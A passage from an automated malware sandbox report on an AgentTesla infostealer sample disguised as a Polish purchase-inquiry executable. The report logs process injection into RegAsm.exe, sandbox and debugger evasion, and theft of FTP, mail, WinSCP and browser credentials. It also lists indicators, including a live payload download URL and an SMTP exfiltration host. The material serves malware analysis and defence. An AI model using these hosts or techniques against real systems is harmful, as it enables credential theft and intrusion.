            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exe, 00000010.00000002.5627003860.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=13YJZJAZQKYRBPSLQ3KNAOBZS8KDFMM8GWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1080160955.0000000002270000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5627003860.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1079503011.00000000005F4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1080160955.0000000002270000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1452Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_02254DC9 rdtsc 5_2_02254DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9957Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeSystem information queried: ModuleInformationJump to behavior
            Source: RegAsm.exe, 00000010.00000002.5634097165.00000000012F0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW<
            Source: RegAsm.exe, 00000010.00000002.5627003860.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8gwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: RegAsm.exe, 00000010.00000002.5634097165.00000000012F0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1080160955.0000000002270000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1080160955.0000000002270000.00000004.00000001.sdmp, RegAsm.exe, 00000010.00000002.5627003860.0000000000BF0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: RegAsm.exe, 00000010.00000002.5631737424.0000000001288000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@
            Source: Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe, 00000005.00000002.1079503011.00000000005F4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeCode function: 5_2_02254DC9 rdtsc 5_2_02254DC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00E46958 LdrInitializeThunk,16_2_00E46958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F00000Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe' Jump to behavior
            Source: RegAsm.exe, 00000010.00000002.5640796571.0000000001880000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000010.00000002.5640796571.0000000001880000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000010.00000002.5640796571.0000000001880000.00000002.00020000.sdmpBinary or memory string: #Program Manager
            Source: RegAsm.exe, 00000010.00000002.5640796571.0000000001880000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9012, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9012, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 9012, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery431Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1383 Sample: Zapytanie ofertowe (SHELMO ... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 23 mail.reyesyasociados.com 2->23 25 spclient.wg.spotify.com 2->25 27 4 other IPs or domains 2->27 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Sigma detected: RegAsm connects to smtp port 2->39 41 3 other signatures 2->41 8 Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe 1 2->8         started        signatures3 process4 signatures5 43 Writes to foreign memory regions 8->43 45 Tries to detect Any.run 8->45 47 Hides threads from debuggers 8->47 11 RegAsm.exe 9 8->11         started        15 RegAsm.exe 8->15         started        17 RegAsm.exe 8->17         started        19 RegAsm.exe 8->19         started        process6 dnsIp7 29 mail.reyesyasociados.com 109.169.39.245, 49748, 587 IOMART-ASGB United Kingdom 11->29 31 drive.google.com 142.250.185.174, 443, 49726 GOOGLEUS United States 11->31 33 googlehosted.l.googleusercontent.com 142.250.185.193, 443, 49727 GOOGLEUS United States 11->33 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 59 3 other signatures 11->59 21 conhost.exe 11->21         started        55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->57 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe32%VirustotalBrowse
            Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe59%ReversingLabsWin32.Trojan.Mucc

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://omoYjp.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://mail.reyesyasociados.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://isQqqrU1x3qSl4S.net0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.185.174
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.185.193
              		truefalse
                		high
                edge-web.dual-gslb.spotify.com
                		35.186.224.25
                		truefalse
                  		high
                  mail.reyesyasociados.com
                  		109.169.39.245
                  		truetrue
                    		unknown
                    spclient.wg.spotify.com
                    		unknown
                    		unknownfalse
                      		high
                      doc-0o-50-docs.googleusercontent.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/hfb1eo2pc77l1m3ao72uchj4vo9g7ss2/1632826875000/00519186742208262786/*/13YjZJAZqkYRBpSLq3kNAObzs8kDFmm8g?e=downloadfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://omoYjp.comRegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://DynDns.comDynDNSRegAsm.exe, 00000010.00000002.5652953298.000000001DF51000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
